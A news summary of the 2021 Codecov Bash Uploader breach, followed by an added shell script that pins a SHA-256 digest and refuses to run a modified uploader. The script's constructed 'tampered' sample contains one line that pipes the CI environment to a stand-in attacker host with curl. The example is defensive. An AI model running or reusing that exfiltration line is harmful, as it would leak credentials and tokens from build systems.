- Codecov’s platform measures code coverage (how much of a codebase is exercised by its test suite) and reports the results inside CI pipelines; its 29,000 clients include Atlassian, Procter & Gamble, GoDaddy, and the Washington Post.
- In a statement on the company’s website, Codecov CEO Jerrod Engelberg acknowledged the breach and the federal investigation, saying someone had gained access to its Bash Uploader script and modified it without the company’s permission.
- The modified version of the tool could have affected:
  - Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
  - Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
  - The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
- Although the tampering began in January, it was not discovered until April 1st, when a customer noticed that the checksum of the Bash Uploader script downloaded from Codecov’s site did not match the checksum published in Codecov’s GitHub repository.
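The check that surfaced the tampering, a digest comparison of the downloaded script against a published value, is the same control a CI pipeline can apply before it ever runs such a script. The following is an added example, not Codecov’s code or part of the original article: it pins a SHA-256 for a reviewed copy of a helper script and refuses to execute any download whose digest differs. The script contents, the "tampered" variant and the pinned digest are constructed for the demo; the tampered copy is written to disk to show the mismatch but is never executed.

```shell
#!/bin/sh
# Added example (not Codecov's code): refuse to run a downloaded CI helper
# script unless its SHA-256 matches a digest pinned alongside the pipeline.
# The two script bodies below are constructed for this demo.

ORIGINAL_SCRIPT='#!/bin/sh
echo "uploading coverage report"
'
# Constructed stand-in for a modified uploader that ships the CI
# environment (tokens, keys) to a third party. Never executed here.
TAMPERED_SCRIPT='#!/bin/sh
echo "uploading coverage report"
env | curl -sm 2 -d @- http://attacker.invalid/upload
'

TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT
GOOD="$TMP/uploader.sh"
BAD="$TMP/uploader-modified.sh"
printf '%s' "$ORIGINAL_SCRIPT" > "$GOOD"
printf '%s' "$TAMPERED_SCRIPT" > "$BAD"

# sha256_of FILE -> hex digest on stdout (sha256sum on Linux, shasum on macOS).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Digest of the copy that was reviewed. In a real pipeline this is a literal
# committed next to the CI config and updated only on a reviewed upgrade; for
# the demo it is computed from the known-good file.
PINNED=$(sha256_of "$GOOD")

# verify_script FILE EXPECTED_SHA256 -> 0 if the digest matches, 1 otherwise.
verify_script() {
  actual=$(sha256_of "$1")
  if [ "$actual" = "$2" ]; then
    return 0
  fi
  echo "checksum mismatch for $1: expected $2, got $actual" >&2
  return 1
}

# verify_then_run FILE EXPECTED_SHA256: execute FILE only after it verifies.
verify_then_run() {
  verify_script "$1" "$2" || return 1
  sh "$1"
}

verify_then_run "$GOOD" "$PINNED"
verify_then_run "$BAD" "$PINNED" || echo "refusing to run modified uploader"
```

The pin must be updated deliberately on each legitimate release, which is the point: a script that changes on the vendor’s server without a matching change in the pinned digest fails the build instead of running with the job’s secrets in its environment. A digest published on the same server as the script does not give this protection, since whoever can replace the script can replace the digest; the value has to come from a second source, such as the project’s own repository.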
- While the breadth of the Codecov breach remains unclear, Reuters notes that it could have an impact as far-reaching as the SolarWinds hack disclosed in late 2020.
– Kim Lyons | April 18, 2021